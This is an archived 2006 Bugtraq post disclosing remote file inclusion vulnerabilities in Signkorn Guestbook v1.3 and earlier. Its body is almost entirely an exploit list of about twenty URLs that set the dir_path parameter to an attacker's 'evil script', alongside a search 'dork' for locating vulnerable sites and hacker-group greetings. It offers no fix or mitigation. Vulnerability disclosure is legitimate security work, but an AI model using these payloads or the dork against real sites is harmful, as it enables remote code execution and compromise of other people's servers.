[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20060913130524.22175.qmail@securityfocus.com>
Date: 13 Sep 2006 13:05:24 -0000
From: x17@...mail.fr
To: bugtraq@...urityfocus.com
Subject: Signkorn Guestbook <= v1.3 Multiple Remote File Include
Vulnerabilities
# Signkorn Guestbook <= v1.3 Multiple Remote File Include Vulnerabilities
# Discovred By : ThE__LeO ;
# Software : Signkorn Guestbook v 1.3 ;
# Dork : "Signkorn Guestbook 1.3" & "Signkorn Guestbook 1.1 " Signkorn Guestbook 1.2"
# Exploit : http://Www.Example.Com/[Script]/index.php?dir_path=[U r Evil Script] ;
http://Www.Example.Com/[Script]/includes/functions.gb.php?dir_path=[U r Evil Script] ;
http://Www.Example.Com/[Script]/includes/functions.admin.php?dir_path=[U r Evil Script] ;
http://Www.Example.Com/[Script]/includes/admin.inc.php?dir_path=[U r Evil Script] ;
http://Www.Example.Com/[Script]/help.php?dir_path=[U r Evil Script] ;
http://Www.Example.Com/[Script]/smile.php?dir_path=[U r Evil Script] ;
http://Www.Example.Com/[Script]/help/en/adminhelp0.php?dir_path=[U r Evil Script] ;
http://Www.Example.Com/[Script]/help/en/adminhelp1.php?dir_path=[U r Evil Script] ;
http://Www.Example.Com/[Script]/help/en/adminhelp2.php?dir_path=[U r Evil Script] ;
http://Www.Example.Com/[Script]/help/en/adminhelp3.php?dir_path=[U r Evil Script] ;
http://Www.Example.Com/[Script]/help/de/adminhelp0.php?dir_path=[U r Evil Script] ;
http://Www.Example.Com/[Script]/help/de/adminhelp1.php?dir_path=[U r Evil Script] ;
http://Www.Example.Com/[Script]/help/de/adminhelp2.php?dir_path=[U r Evil Script] ;
http://Www.Example.Com/[Script]/help/de/adminhelp3.php?dir_path=[U r Evil Script] ;
http://Www.Example.Com/[Script]/entry.php?dir_path=[U r Evil Script] ;
http://Www.Example.Com/[Script]/admin/preview.php?dir_path=[U r Evil Script] ;
http://Www.Example.Com/[Script]/admin/log.php?dir_path=[U r Evil Script] ;
http://Www.Example.Com/[Script]/admin/index.php?dir_path=[U r Evil Script] ;
http://Www.Example.Com/[Script]/admin/config.php?dir_path=[U r Evil Script] ;
http://Www.Example.Com/[Script]/admin/admin.php?dir_path=[U r Evil Script] ;
# Greetz : M.I.D.T[DrackanZ, Mr.IlysS, NeThug47],Arabian-FighterZ, lhma9, Death & All Moroccan & Arab Hackers ;
# Safi Braka yallah Tla7 ;)
Powered by blists - more mailing lists